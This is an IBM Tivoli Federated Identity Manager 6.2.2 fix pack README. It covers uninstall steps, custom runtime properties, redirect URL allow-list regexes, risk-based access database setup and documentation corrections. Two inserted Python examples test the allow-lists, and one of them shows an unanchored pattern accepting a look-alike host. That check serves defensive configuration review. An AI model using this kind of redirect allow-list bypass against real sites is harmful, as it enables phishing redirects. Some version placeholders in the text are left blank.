- To deploy the risk-based access runtime environment and plug-ins, run the following wsadmin command:
$AdminTask manageRbaConfiguration {-operation deploy}
Perform these steps to ensure that the Tivoli Federated Identity Manager configuration is compatible with 6.2.2-TIV-TFIM-FP0002 or 6.2.2 with no fix pack applied. Skip this step if you are uninstalling this fix pack to return your installation to 6.2.2-TIV-TFIM-FP0004 or a later fix pack version.
- Log in to the Integrated Solutions Console.
- Select Domain Management -> Import and Export Configuration.
- Click Export Configuration to backup the current configuration to a configuration archive.
- Select Domain Management -> Runtime Node Management.
- Click Runtime Custom Properties.
- Click Create.
- Specify a new runtime custom property
SPS.AllowDeleteReadOnlyPointOfContactProfile
with the value true
.
- Click OK.
- Select Domain Management -> Point of Contact.
- Select a point of contact profile with one or more authentication policy callbacks specified and click Delete. To identify such a point of contact profile:
- Select a point of contact profile.
- Click Properties.
- Click Authentication Policy.
- Check the list in Callbacks. If there is one or more authentication policy callbacks specified, delete this point of contact profile.
- Repeat the previous step for each point of contact profile with one or more authentication policy callbacks specified.
- Unconfigure a one-time password federation by typing the command
$AdminTask manageItfimOneTimePassword { -operation unconfigure -fimDomainName domainName -federationName federationName }
in wsadmin tool.
- Repeat the previous step for each one-time password federation.
- Reload the Tivoli Federated Identity Manager runtime by typing the following command in the wsadmin tool:
$AdminTask reloadItfimRuntime { -fimDomainName domainName }
NOTE: Before uninstalling this fix pack, ensure
that you completed the steps in Before uninstalling the
fix pack.
If you want to return your installation to the state it was in
before installing the fix pack, you can uninstall the
fix pack.
- Ensure that the WebSphere Application Server that hosts the
Federated Identity Manager runtime and management service components
is running.
- Ensure that the WebSphere Application Server that hosts the
Federated Identity Manager console component is running.
- Start the appropriate IBM WebSphere Update Installer (typically
located in C:\Program Files\IBM\WebSphere\UpdateInstaller on Windows
systems, or in the equivalent directory on UNIX-based systems).
- In the Welcome window, click Next. Tivoli Federated
Identity Manager is not listed, but is supported.
- Specify the path to the installation directory for Tivoli
Federated Identity Manager (typically C:\Program Files\IBM\FIM on
Windows systems, or the equivalent directory for UNIX-based systems),
then click Next.
- Select Uninstall maintenance in the dialog.
- The Update Installer automatically removes the
fix pack and restores the previously installed version of
Federated Identity Manager.
- Verify the successful uninstallation of the
fix pack:
- Log in to the administration console.
- In the Welcome window, verify that the version number is
not 6.2.2. and corresponds to the software level on
which you installed fix pack .
For example, if you installed fix pack
onto a Federated Identity Manager 6.2.2.0 system, then after
uninstalling fix pack you would see the
following:
Suite Name Version
----------------------------------------------------------
Tivoli Federated Identity Manager 6.2.2.0 [111110a]
NOTE: If you are using the Kerberos Delegation STS module,
you need to do the following to ensure the Kerberos Delegation DLL is
not loaded in the Java
Virtual Machine when it is replaced during runtime component deployment:
- Restart all the runtime nodes.
- Do not make any requests to the STS chain that invokes the Kerberos Delegation STS
module.
- Deploy the runtime component. See Deploying the
fix pack runtime component for details.
- Publish the plug-ins to the runtime and reload the
configuration:
- Log in to the administration console.
- Select Domain Management -> Runtime Node
Management.
- Click Publish Plugins.
- After the plug-ins are published, reload the runtime
configuration.
- Redeploy the runtime for each domain:
- Log in to the administration console.
- Select Domain Management -> Runtime Node
Management.
- Click Deploy Runtime.
- Wait for the deployment to finish by selecting Click
to refresh runtime deployment status and check for completion....
- Verify that the currently deployed version is the version
you had before installing the fix pack:
- In the administration console, navigate to the Runtime
Node Management window.
- Look in the Runtime Management section of the Runtime
Nodes portlet in the right panel. Review the Runtime Information.
For example:
Runtime Information
----------------------------------------------
Current deployed version 6.2.2.0 [111110a]
- Repeat the previous step for each node in a WebSphere
cluster environment.
Back to Contents
The product documentation for Federated Identity Manager, Version
6.2.2, can be found in the
IBM® Tivoli® Federated Identity Manager Knowledge Center.
In the IBM Tivoli Federated Identity Manager Configuration Guide,
under the section Customizing Runtime Properties > Custom Properties
Reference, a new custom property is added. This property is:
SAML20.IncludeInclusiveNamespaces%<FEDERATIONID>%<PARTNERID>
    A boolean value to determine whether to include the InclusiveNamespaces element in the SAML 2.0 assertion. This configuration is specific to a federation partner.
    Default value: true
    Value type: boolean
    Example configuration: SAML20.IncludeInclusiveNamespaces%https://samlip/sps/ipfed/saml20%https://samlsp/sps/spfed/saml20 = false
Back to Contents
OPTION TO RETURN TOKENTYPE IN WS-FEDERATION RESPONSE
In the IBM Tivoli Federated Identity Manager Configuration Guide,
under the section Customizing Runtime Properties > Custom Properties
Reference, a new custom property is added. This property is:
WSFed.IDP.Response.TokenType%<FEDERATIONID>%<PARTNERID>
    A string value to determine the TokenType to return. This configuration is specific to a federation partner.
    Default value: null (do not return TokenType)
    Value type: string
    Example configuration: WSFed.IDP.Response.TokenType%https://idp/sps/fed/wsf%https://sp/sps/fed/wsf = urn:oasis:names:tc:SAML:1.0:assertion
Back to Contents
DEADLOCKS OCCUR IN THE RBA SESSION TABLES (IV77587)
In the IBM Tivoli Federated Identity Manager Configuration Guide,
under the section Customizing Runtime Properties > Custom Properties
Reference, a new custom property is added. This property is:
session.deletes.per.commit
    An integer value that determines the number of sessions deleted per database commit. This is a tuning parameter to prevent deadlocks in the risk-based access database.
    Default value: 0 (unlimited)
    Value type: integer
    Example value: 1
Back to Contents
PREVENT DEADLOCKS IN THE RBA SESSION TABLES (IV77588)
If you upgrade from a previous version of risk-based access, you must run the schema upgrade SQL script.
Some SQL statements in this script might fail if this is not the first time you upgrade risk-based access.
See the Updating the database schema for risk-based access section for details.
Back to Contents
UPDATED PRE-INSTALLATION INSTRUCTIONS (IV77597)
Refer to the sections INCORRECT KEYSTORE PATH and UPDATE INSTALLER for updated pre-installation instructions.
Back to Contents
Custom Runtime Property to enable / disable URL validation in APAR IV64349, IV64376 and IV64494 (IV64325)
In the IBM Tivoli Federated Identity Manager Configuration Guide,
under the section Customizing Runtime Properties > Custom Properties
Reference, a new custom property is added. This property is:
redirecturl.validation.enabled
    A value of true or false that enables or disables the URL validation introduced in APARs IV64349, IV64376 and IV64494.
    Default value: false
    Value type: boolean
    Example value: false
Back to Contents
Specifying allowed URLs at SAML 1.1 and SAML 2.0 federation and partner level through WebSphere CLI (IV64349)
When allowed URLs are set at both the federation and partner levels, the white list at the partner level takes precedence.
Specifying allowed URLs to SAML 1.1 and SAML 2.0 at partner level
- Create a response file from the SAML 1.1 or SAML 2.0 partner through the manageItfimPartner command.
- Open the exported response file in a text editor and add the RedirectAllowedURLs entry to the partner response file as follows. More than one URL can be specified, each as a regular expression.
<void method="put">
<string>RedirectAllowedURLs</string>
<object class="java.util.ArrayList">
<void method="add">
<string>http://.*\.domain1\.com.*</string>
</void>
<void method="add">
<string>http://.*\.domain2\.com.*</string>
</void>
</object>
</void>
- Apply the modified response file to the SAML 1.1 or SAML 2.0 partner through the manageItfimPartner command.
- Log in to the administration console, select Domain Management -> Runtime Node Management, and click Reload Configurations.
Specifying allowed URLs to SAML 1.1 and SAML 2.0 at federation level
- Create a response file from the SAML 1.1 or SAML 2.0 federation through the manageItfimFederation command.
- Open the exported response file in a text editor and add the RedirectAllowedURLs entry to the federation response file as follows. More than one URL can be specified, each as a regular expression.
<void method="put">
<string>RedirectAllowedURLs</string>
<object class="java.util.ArrayList">
<void method="add">
<string>http://.*\.domain1\.com.*</string>
</void>
<void method="add">
<string>http://.*\.domain2\.com.*</string>
</void>
</object>
</void>
- Apply the modified response file to the SAML 1.1 or SAML 2.0 federation through the manageItfimFederation command.
- Log in to the administration console, select Domain Management -> Runtime Node Management, and click Reload Configurations.
Back to Contents
Specifying allowed URLs to OpenID federation level through WebSphere CLI. (IV64376)
Specifying allowed URLs to OpenID federation level
- Create a response file from the OpenID federation through the manageItfimFederation command.
- Open the exported response file in a text editor and add the RedirectAllowedURLs entry to the federation response file as follows. More than one URL can be specified, each as a regular expression.
<void method="put">
<string>RedirectAllowedURLs</string>
<object class="java.util.ArrayList">
<void method="add">
<string>http://.*\.domain1\.com.*</string>
</void>
<void method="add">
<string>http://.*\.domain2\.com.*</string>
</void>
</object>
</void>
- Apply the modified response file to the OpenID federation through the manageItfimFederation command.
- Log in to the administration console, select Domain Management -> Runtime Node Management, and click Reload Configurations.
Back to Contents
Specifying URLs that the Authentication Service can redirect to (IV64494)
In the IBM Tivoli Federated Identity Manager Configuration Guide,
under the section Customizing Runtime Properties > Custom Properties
Reference, a new custom property is added. This property is:
redirecturl.validation.whitelist
    A comma-separated list of regular expressions. The FIM Authentication Service can redirect to a URL that matches any of the regular expressions.
    Default value: (none)
    Value type: string
    Example value: https://examplehost/JCT/protectedresource/.*,https://examplehost2/JCT2/protectedresource2/.*
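The RedirectAllowedURLs entries in the response files above and the redirecturl.validation.whitelist property both take a comma-separated list of regular expressions. The following Python is an added example, not code from this README or from the product: it parses such a list and applies it to constructed candidate redirect targets, assuming full-match semantics (the exact matching call the product uses is not stated here), and shows why an unanchored pattern of the shape http://.*\.domain1\.com.* also accepts a host that merely contains the allowed name, next to a tighter pattern constructed for comparison.

```python
import re

# Allow-list value in the shape used on this page for RedirectAllowedURLs and
# redirecturl.validation.whitelist: a comma-separated list of regular expressions.
PAGE_PATTERNS = r"http://.*\.domain1\.com.*,http://.*\.domain2\.com.*"

# A tighter list constructed for this example: scheme fixed, exactly one host
# label before the allowed domain, and the host must end where the path begins.
TIGHT_PATTERNS = (
    r"https?://[a-z0-9-]+\.domain1\.com(/.*)?,"
    r"https?://[a-z0-9-]+\.domain2\.com(/.*)?"
)

# Constructed candidate redirect targets, not taken from the README.
SAMPLE_URLS = [
    "http://www.domain1.com/app",            # intended host
    "http://www.domain2.com/",               # intended host, second pattern
    "http://www.domain1.com.example.org/",   # host that merely contains the allowed name
    "http://domain1.com/",                   # apex domain, no label before .domain1.com
    "http://otherdomain.com/",               # unrelated host
]


def parse_allowlist(value):
    """Split a comma-separated property value into compiled patterns.

    Assumption: each entry is compiled as a regular expression and the whole
    URL has to match it (Java String.matches() semantics). The README does not
    state the exact matching call, so this is a model of the check.
    """
    return [re.compile(entry.strip()) for entry in value.split(",") if entry.strip()]


def is_allowed(url, patterns):
    """Return True when the URL fully matches any pattern in the list."""
    return any(p.fullmatch(url) for p in patterns)


def evaluate(value, urls=SAMPLE_URLS):
    """Map each candidate URL to the allow/deny decision for the given list."""
    patterns = parse_allowlist(value)
    return {url: is_allowed(url, patterns) for url in urls}


def overmatched(value, urls=SAMPLE_URLS):
    """URLs that `value` accepts but the tighter, anchored list rejects."""
    loose = evaluate(value, urls)
    tight = evaluate(TIGHT_PATTERNS, urls)
    return sorted(u for u in urls if loose[u] and not tight[u])


if __name__ == "__main__":
    for url, ok in evaluate(PAGE_PATTERNS).items():
        print(f"{'allow' if ok else 'deny ':5} {url}")
    print("accepted only by the unanchored list:", overmatched(PAGE_PATTERNS))
```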
Back to Contents
COUNTER-BASED ONE-TIME PASSWORD AND TIME-BASED ONE-TIME PASSWORD SUPPORT
For more information on counter-based one-time password (HOTP) and time-based one-time password (TOTP), see the IBM Tivoli Federated Identity Manager Knowledge Center.
Back to Contents
TFIMCFG UTILITY SUPPORT FOR WEBSEAL OAUTH EAS
See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.
Back to Contents
SUPPORTED MACROS FOR CUSTOMIZING AN AUTHENTICATION LOGIN FORM
See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.
Back to Contents
ONE-TIME PASSWORD SUPPORT FIXES (IV36145)
For more information on outbound HTTP proxy server support, SMS success or failure determination, new one-time password error messages, creating user-defined macros, one-time password delivery and provider updates, one-time password resend support, and the unauthenticated one-time password flow, see the IBM Tivoli Federated Identity Manager Knowledge Center.
Back to Contents
USER SELF CARE SUPPORT FIX (IV36140)
For more information on User Self Care session information storage, see the IBM Tivoli Federated Identity Manager Knowledge Center.
Back to Contents
TFIMCFG UTILITY SUPPORT FOR WEB GATEWAY APPLIANCE
See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.
Back to Contents
USER SELF CARE MULTIPLE SECRET QUESTION
See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.
Back to Contents
ONE-TIME PASSWORD
See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.
The API documentation for the custom pluggable interfaces is contained in 6.2.2-TIV-ITFIM-FP00010-doc.zip. This .zip file can be found in the file you downloaded in Downloading the fix pack. You must unpackage the files in FIM_INSTALL_DIR.
See the API documentation for more details on how to extend the one-time password implementation.
See ONE-TIME PASSWORD SUPPORT FIXES for more information on fixes for the one-time password support since Tivoli Federated Identity Manager 6.2.2, LA interim fix 5.
Back to Contents
RISK-BASED ACCESS
See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.
Back to Contents
The following procedure is found in the IBM Tivoli Federated Identity Manager Knowledge Center.
- Install a supported
database.
- Create and configure a JNDI context named jdbc/rba in WebSphere® Application
Server.
For more information, see the WebSphere Application
Server Version 7.0 Knowledge Center at http://pic.dhe.ibm.com/infocenter/wasinfo/v7r0/index.jsp.
Search for configuring a data source.
- Run the script to create the database schema for risk-based
access.
- AIX® or Linux systems
The scripts to create the database are in the /opt/IBM/FIM/rba/dbscripts/ directory.
- Run the create_schema.sh shell script that
is in the folder that corresponds to your database.
- When you run the script, specify the database user name, which
is a required parameter. For example, for DB2:
/opt/IBM/FIM/rba/dbscripts/db2/create_schema.sh database_user_name
- Windows systems
The SQL files and the batch file to create the database schema
are in the
C:\Program Files\IBM\FIM\rba\dbscripts\ directory.
- Edit the create_schema.sql file and replace &DBUSER with
the database user name.
- Run the create_schema.bat batch file that
is in the folder that corresponds to your database. Specify the create_schema.sql file
as the input parameter. For example, for DB2:
C:\Program Files\IBM\FIM\rba\dbscripts\db2\create_schema.bat create_schema.sql
- When the SQL script starts executing, you are prompted
for a password. Enter the password of the database user to proceed.
It should state:
- Install a supported
database.
- Create and configure a JNDI context named jdbc/rba in WebSphere® Application
Server.
For more information, see the WebSphere Application
Server Version 7.0 Knowledge Center at http://pic.dhe.ibm.com/infocenter/wasinfo/v7r0/index.jsp.
Search for configuring a data source.
- Set the default data access isolation level to Cursor Stability for the data source created in step 2.
For more information, see the WebSphere Application
Server Version 7.0 Knowledge Center at http://pic.dhe.ibm.com/infocenter/wasinfo/v7r0/index.jsp.
Search for setting data access isolation levels.
- Run the script to create the database schema for risk-based
access.
- AIX® or Linux systems
The scripts to create the database are in the /opt/IBM/FIM/rba/dbscripts/ directory.
- Run the create_schema.sh shell script that
is in the folder that corresponds to your database.
- When you run the script, specify the database user name, which
is a required parameter. For example, for DB2:
/opt/IBM/FIM/rba/dbscripts/db2/create_schema.sh database_user_name
- Windows systems
The SQL files and the batch file to create the database schema
are in the
C:\Program Files\IBM\FIM\rba\dbscripts\ directory.
- Edit the create_schema.sql file and replace &DBUSER with
the database user name.
- Run the create_schema.bat batch file that
is in the folder that corresponds to your database. Specify the create_schema.sql file
as the input parameter. For example, for DB2:
C:\Program Files\IBM\FIM\rba\dbscripts\db2\create_schema.bat create_schema.sql
- When the SQL script starts executing, you are prompted
for a password. Enter the password of the database user to proceed.
Back to Contents
The WebSEAL server or Web Gateway Appliance that is used as a point of contact can sit behind a device that offloads SSL and translates the port, for example an F5 load balancer fronting WebSEAL, with the point of contact URL pointing to the F5 server. In fix pack 9 and earlier, the tfimcfg tool reads the TCP/SSL port of the point of contact server from the WebSEAL configuration file or from the Web Gateway Appliance. However, these might not be the same ports used by the device fronting WebSEAL or the Web Gateway Appliance, if such a device is used.
To specify the HTTP/HTTPS port of the device that is fronting WebSEAL, the following properties can be added to the tfimcfg tool response file:
webseal.http: Boolean value (true/false) indicating whether TCP is enabled
webseal.https: Boolean value (true/false) indicating whether SSL is enabled
webseal.httpport: TCP port
webseal.httpsport: SSL port
Back to Contents
- APAR Symptom
- TFIM allows you to create your own mapping rules, which can be used to implement custom authorization or state management requirements during an OAuth 2.0 flow. When a failure happens in this custom authorization, it is not possible to delete the access token that was generated.
- Error description
- The generated access token stays in the OAuth token cache.
- About this task
- After the fix pack is installed, follow the steps below.
- Procedure
- Edit your OAuth mapping rule to remove the generated access token when the custom authorization fails.
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.uuser);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.utilities);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.modules.oauth20.utils);
// do custom authorization
// authResult = ...
// if custom authorization failed, remove the access token that was already generated
if (authResult == false) {
    var access_token = null;
    // Read the access token from the OAuth response attributes of the STS universal user
    var temp_attr = stsuu.getContextAttributes().getAttributeValuesByNameAndType(
        "access_token", "urn:ibm:names:ITFIM:oauth:response:attribute");
    if (temp_attr != null && temp_attr.length > 0) {
        access_token = temp_attr[0];
    }
    if (access_token != null) {
        // Remove the token from the OAuth token cache so it cannot be used
        OAuth20STSUtilities.removeOauthToken(access_token, stsrequest);
    }
    // handle failure
}
- Save the modified mapping rule.
- From the Integrated Solutions Console, navigate to Tivoli Federated Identity Manager > Configure Federated Single Sign-On > Federations.
- Select the OAuth 2.0 federation and click Properties ....
- Under Identity Mapping Properties click Modify Current Properties ....
- Under Identity Mapping Rule for federation <federation> click Modify Rule ....
- Under Import new Identity Mapping Rule for federation <federation> click Choose File and choose your modified mapping rule.
- Under Identity Mapping Rule for federation <federation> click Modify Rule ....
- Click Import File, then click OK.
- Click Load configuration changes to Tivoli Federated Identity Manager runtime.
Back to Contents
The DB2 schema creation scripts have been updated to remove the macro &DBPASSWD
so that the db2 command will prompt for password.
In the IBM Tivoli Federated Identity Manager Configuration Guide, under the section One-time password > Customizing one-time password > One-time password user information provider plug-in reference > Setting up DB2 for one-time password user information storage, it is stated:
a. Edit the create_schema.sql file, and replace &DBUSER and $DBPASSWD with the database user name and password.
With the fix, it should now be:
a. Edit the create_schema.sql file, and replace &DBUSER with the database user name.
Back to Contents
In the IBM Tivoli Federated Identity Manager Configuration Guide, under the section Customizing Runtime Properties > Custom Properties Reference > Custom Properties for SAML 2.0, a new custom property is added. This property is:
SAML20.CDC.RelayStateAllowedURLs_<FEDERATIONID>
    A comma-separated list of regular expressions. The SAML 2.0 Identity Provider Discovery Profile common domain cookie reading and writing service of <FEDERATIONID> can redirect to a URL that matches any of the regular expressions.
    Default value: the SPS URL of the common domain cookie reading or writing service endpoint, for example https://examplehost/FIM/sps/.*
    Value type: string
    Example value: https://examplehost/JCT/protectedresource/.*,https://examplehost2/JCT2/protectedresource2/.*
Back to Contents
This issue is only relevant if TOTP is configured with one-time use enforcement enabled.
Cache lookup retries
WebSphere does not automatically replicate all of the cached data between nodes. Instead, it replicates only the keys between nodes and retrieves the data when a particular node requests it. Assume that a key is requested on a particular node and is not found in the cache. By default, FIM retries the cache lookup, allowing time for WebSphere to complete any pending replication. The downside is that waiting for replication takes time, and that time translates into a slower user experience.
There are two parameters that control the retry behavior (see below for details):
- DistributedMap.GetRetryLimit
- DistributedMap.GetRetryDelay
(Note: These parameters affect all of FIM, not just TOTP. This is appropriate, because every cache is subject to the same timing considerations and the same tuning should be applied to all.)
Starting configuration
Start by configuring TFIM not to retry at all, then enable retries if necessary. To do so, set the value of the DistributedMap.GetRetryLimit parameter to '0' by following the steps below. If FIM is deployed on a single application server, it is safe to set GetRetryValue and GetRetryLimit to 0, since there is only one distributed cache instance and no propagation is needed.
Configuration
- DistributedMap.GetRetryLimit
    This parameter controls the number of times FIM retries a lookup if a key is not found. If a key is not found, FIM waits for the time specified by the DistributedMap.GetRetryDelay parameter, described in the next section. The default setting for DistributedMap.GetRetryLimit is '10', meaning that ten retries are performed.
To configure:
- Using ISC, Click Tivoli Federated Identity Manager -> Domain Management -> Runtime Node Management.
- Enter the string "DistributedMap.GetRetryLimit" in the Name field.
- Enter a number in the Value field.
- Click OK to apply the changes that you have made and exit from the panel.
- Load the configuration changes.
- DistributedMap.GetRetryDelay
    This parameter controls how long FIM waits between lookups. The default value is '2000', meaning that FIM waits 2 seconds before performing the retry.
To configure:
- Using ISC, Click Tivoli Federated Identity Manager -> Domain Management -> Runtime Node Management.
- Enter the string "DistributedMap.GetRetryDelay" in the Name field.
- Enter a number in the Value field.
- Click OK to apply the changes that you have made and exit from the panel.
- Load the configuration changes.
TOTP validation procedure
When one-time use enforcement is enabled, an OTP that has been used is stored in the distributed cache.
When validating an incoming OTP, FIM looks up the cache to determine whether the OTP has already been used.
If the lookup fails, validation proceeds.
If the lookup succeeds, the OTP has been used before and validation fails.
RISK OF INSUFFICIENT RETRY
If FIM does not find the entry, it might allow the OTP to be re-used on another TFIM instance in the cluster.
RISK OF EXCESSIVE RETRY
Validation of the OTP takes longer than necessary. A successful OTP validation takes at least GetRetryDelay (ms) x GetRetryLimit.
Back to Contents
IRRELEVANT PARAMETERS IN SAML PARTNER RESPONSE FILE DOCUMENTATION (IV41598)
The following parameters are documented in the Command reference > manageItfimPartner > SAML partner response file reference section of the Tivoli Federated Identity Manager Administration Guide v6.2.2 and earlier:
- IncludeCertData
- IncludeIssuerDetails
- IncludePublicKey
- IncludeSubjectKeyId
- IncludeSubjectName
- IncludeX509CertData or IncludeX509CertificateData
- IncludeX509IssuerDetails
- IncludeX509SubjectKeyIdentifier
- IncludeX509SubjectName
These parameters are not relevant to the SAML partner response file and must be removed from this section.
The following parameters are relevant to the SAML federation response file and are documented in the Command reference > manageItfimFederation > SAML federation response file reference section:
- IncludeCertData
- IncludeIssuerDetails
- IncludePublicKey
- IncludeSubjectKeyId
- IncludeSubjectName
Back to Contents
CANNOT CONFIGURE TIVOLI FEDERATED IDENTITY MANAGER
TO USE POST ONLY IN OPENID FLOWS (IV37707)
You can use the following custom property to configure Tivoli Federated Identity Manager to use POST for messages:
OpenID.AlwaysPost
Enforces the communication between an Identity Provider and a Service Provider to use POST as the request method regardless of payload size.
Type: Boolean
Example value: False (default)
Back to Contents
TIVOLI ACCESS MANAGER JAVA RUNTIME 6.1.1 FP1 OR ABOVE REQUIRED FOR TAM ADAPTER (IV44466)
In the IBM Tivoli Federated Manager 6.2.2 Configuration Guide, under the topic Deploying User Self Care > Configuring a user registry > Configuring a Tivoli Access Manager adapter for WebSphere Federated Repository > Configuring a Tivoli Access Manager adapter > Procedure, it states:
3. Ensure that you have installed the Tivoli Access Manager 6.1.1 Java runtime component.
Tivoli Access Manager 6.1.1 Fixpack 1 or above contains fixes for the Java runtime component that are required if you want to use the Tivoli Access Manager adapter for WebSphere Federated Repository.
It should state:
3. Ensure that you have installed the Tivoli Access Manager Java runtime version 6.1.1 or above. If you have installed version 6.1.1, ensure that you have applied Fixpack 1 or above.
Back to Contents
INCORRECT STEPS FOR ENABLING WEBSPHERE
CLUSTER REPLICATION (IV36167)
Some of the steps outlined in the TFIM 6.2.2 Configuration guide
for enabling WAS cluster replication are incorrect.
Under section Federated Identity Manager >
Configuring > Domain configuration, in the topic
"Enabling replication in a WebSphere cluster", steps 3 and 9a are wrong.
The current steps are:
- In the General Properties section of the screen,
go to the Consistency settings section. Select
Enable cache replication.
Verify that the Consistency Settings area has the following values:
- Full group replication domain
Select the name of the cluster into which you
have deployed the runtime application
- Replication type: Both push and pull
- Push frequency: 0
- Specify your replication settings in the General Properties panel:
- Set the Replication domain to the name of the cluster into
which you have deployed the Tivoli Federated Identity Manager
runtime application.
- Set Replication mode to
Both client and server.
The TFIM cluster does not appear in the "replication
domain" options.
The steps should be:
- In the General Properties section of the screen,
go to the Consistency settings section. Select
Enable cache replication.
Verify that the Consistency Settings area has the following values:
- Full group replication domain
Select the replication domain created when
Tivoli Federated Identity Manager application is deployed, for example
FIM-your_cluster_name
or FIM-your_server_name.
- Replication type: Both push and pull
- Push frequency: 0
- Specify your replication settings in the General Properties panel:
- Set the Replication domain to the name of the
replication domain created when Tivoli Federated Identity Manager runtime
application is deployed, for example
FIM-your_cluster_name
or FIM-your_server_name.
- Set Replication mode to
Both client and server.
Back to Contents
CUSTOM PROPERTIES FOR WS-FEDERATION (IV31660)
- WSFed.IDP.RSTR.Excluded.Elements
    Specifies the comma-separated list of elements to be excluded from the RequestSecurityTokenResponse before it is sent to the service provider. The elements that can be excluded are "Renewing", "Forwardable", "Status" and "Delegatable".
    The list of excluded elements can be controlled at three levels:
    - Global level
      Controls the list of excluded elements for all federations and partners.
      Configuration example: WSFed.IDP.RSTR.Excluded.Elements = Forwardable,Delegatable,Status,Renewing
    - Federation level
      Controls the list of excluded elements for a specific federation and all its partners.
      Configuration example: WSFed.IDP.RSTR.Excluded.Elements%<FEDERATIONID> = Forwardable,Delegatable,Status,Renewing
      Example for a federation with the ID https://idp/sps/fed/wsf:
      WSFed.IDP.RSTR.Excluded.Elements%https://idp/sps/fed/wsf = Forwardable,Delegatable,Status,Renewing
    - Partner level
      Controls the list of excluded elements for a specific federation and a specific partner.
      Configuration example: WSFed.IDP.RSTR.Excluded.Elements%<FEDERATIONID>%<PARTNERID> = Forwardable,Delegatable,Status,Renewing
      Example for a federation with the ID https://idp/sps/fed/wsf and its partner with the ID https://sp/sps/fed/wsf:
      WSFed.IDP.RSTR.Excluded.Elements%https://idp/sps/fed/wsf%https://sp/sps/fed/wsf = Forwardable,Delegatable,Status,Renewing
    Value type: String
    Example value: Forwardable,Delegatable,Status,Renewing
<FEDERATIONID> represents the Provider ID of the federation and <PARTNERID> represents the Provider ID of the partner. You can obtain the Provider ID of the federation from the Federation Properties page in the console, while the Provider ID of the partner can be obtained from the Partner Properties page in the console.
You can use the three levels of control
concurrently. Tivoli Federated Identity Manager implements concurrent
use by checking the
settings to decide what action to take in the following order:
- Partner level setting
- Federation level setting
- Global level setting
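As an added example (not code from this README or from the product), the following Python resolves WSFed.IDP.RSTR.Excluded.Elements in the order just given, partner level first, then federation level, then global, and applies the resolved list to a constructed RequestSecurityTokenResponse. The same name%<FEDERATIONID>%<PARTNERID> key scheme is used by the SAML20.IncludeInclusiveNamespaces and WSFed.IDP.Response.TokenType properties documented earlier. The property values, the second partner and federation IDs, and the WS-Trust 1.2 namespace of the sample RSTR are assumptions; the page names the four excludable elements but not their namespace.

```python
import xml.etree.ElementTree as ET

PROPERTY = "WSFed.IDP.RSTR.Excluded.Elements"

# Assumption: the RSTR uses the WS-Trust 1.2 namespace. The README lists the
# excludable element names only, so this is a constructed model of the message.
WST_NS = "http://schemas.xmlsoap.org/ws/2005/02/trust"

# Constructed runtime custom properties in the key scheme described in this section.
# The federation and first partner IDs are the ones used in the README's examples.
PROPERTIES = {
    PROPERTY: "Status",                                                        # global
    PROPERTY + "%https://idp/sps/fed/wsf": "Status,Renewing",                  # federation
    PROPERTY + "%https://idp/sps/fed/wsf%https://sp/sps/fed/wsf": "Forwardable,Delegatable",  # partner
}

# Constructed RequestSecurityTokenResponse carrying all four excludable elements.
SAMPLE_RSTR = f"""<wst:RequestSecurityTokenResponse xmlns:wst="{WST_NS}">
  <wst:TokenType>urn:oasis:names:tc:SAML:1.0:assertion</wst:TokenType>
  <wst:RequestedSecurityToken/>
  <wst:Renewing Allow="false"/>
  <wst:Forwardable>false</wst:Forwardable>
  <wst:Delegatable>false</wst:Delegatable>
  <wst:Status><wst:Code>{WST_NS}/status/valid</wst:Code></wst:Status>
</wst:RequestSecurityTokenResponse>"""


def resolve_excluded(props, federation_id, partner_id):
    """Check the three levels in the order given on this page: partner level,
    then federation level, then global. The first level that defines a value wins."""
    keys = (
        f"{PROPERTY}%{federation_id}%{partner_id}",
        f"{PROPERTY}%{federation_id}",
        PROPERTY,
    )
    for key in keys:
        if key in props:
            return [name.strip() for name in props[key].split(",") if name.strip()]
    return []


def strip_rstr(rstr_xml, excluded):
    """Remove the excluded top-level RSTR elements and return the root element."""
    root = ET.fromstring(rstr_xml)
    for name in excluded:
        for element in root.findall(f"{{{WST_NS}}}{name}"):
            root.remove(element)
    return root


def remaining_elements(props, federation_id, partner_id, rstr_xml=SAMPLE_RSTR):
    """Local names of the RSTR children left after applying the resolved exclusion list."""
    excluded = resolve_excluded(props, federation_id, partner_id)
    root = strip_rstr(rstr_xml, excluded)
    return [child.tag.split("}", 1)[1] for child in root]


if __name__ == "__main__":
    cases = [
        ("https://idp/sps/fed/wsf", "https://sp/sps/fed/wsf"),        # partner-level value applies
        ("https://idp/sps/fed/wsf", "https://other-sp/sps/fed/wsf"),  # federation-level value applies
        ("https://idp2/sps/fed/wsf", "https://sp/sps/fed/wsf"),       # only the global value applies
    ]
    for fed, partner in cases:
        print(fed, partner, "->", remaining_elements(PROPERTIES, fed, partner))
```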
Back to Contents
LDAP MIGRATION TOOL DOES NOT WORK FOR NON-DEFAULT USER IDENTIFIER ATTRIBUTE (IV31661)
In the IBM Tivoli Federated Manager 6.2.2 Installation Guide, under the topic Appendix A. Upgrading to version 6.2.2->Upgrading LDAP, it states:
Other parameters are available to pass to this tool:
-reverse
performs a reverse migration.
-deleteAbandonedEntries
deletes any entries that refer to a DN that no longer exists. This process occurs before the migration step.
-Z
enables the SSL connection to the LDAP server.
For the -reverse
parameter, it should state:
-reverse
performs a reverse migration. This does not delete entries added during migration. It ensures that the entries are compatible with Tivoli Federated Identity Manager versions before 6.2.1.
Two new parameters are now available to pass to this tool:
-userAttr
specifies the attribute that the alias service uses to denote the user identifier.
-force
performs migration for all entries including those that have previously been migrated.
Back to Contents
WRONG REQUIREMENT FOR CONSTRAINED DELEGATION ACCOUNT (IV24708)
In the IBM Tivoli Federated Manager 6.2.2 Configuration Guide, under the topic Configuring Active Directory and WebSphere for constrained delegation, it states:
6. On the domain controller, add the tfimdeleguser user to the Domain administrative group.
To verify:
a. Select Active Directory Users and Computer
b. For the domain, click Users and click Domain Admins
c. Select the Members tab. Verify that the tfimdeleguser is listed as a group member.
It should state:
6. On the machine hosting the WebSphere node agent running the Tivoli Federated Identity Manager runtime, add the tfimdeleguser user to the Local administrative group.
To verify:
a. Select Start > Programs > Administrative Tools > Computer Management.
b. Open Local Users and groups.
c. Open groups.
d. Right-click on the local group Administrators.
e. Select Properties.
f. Verify that the tfimdeleguser is listed as a group member.
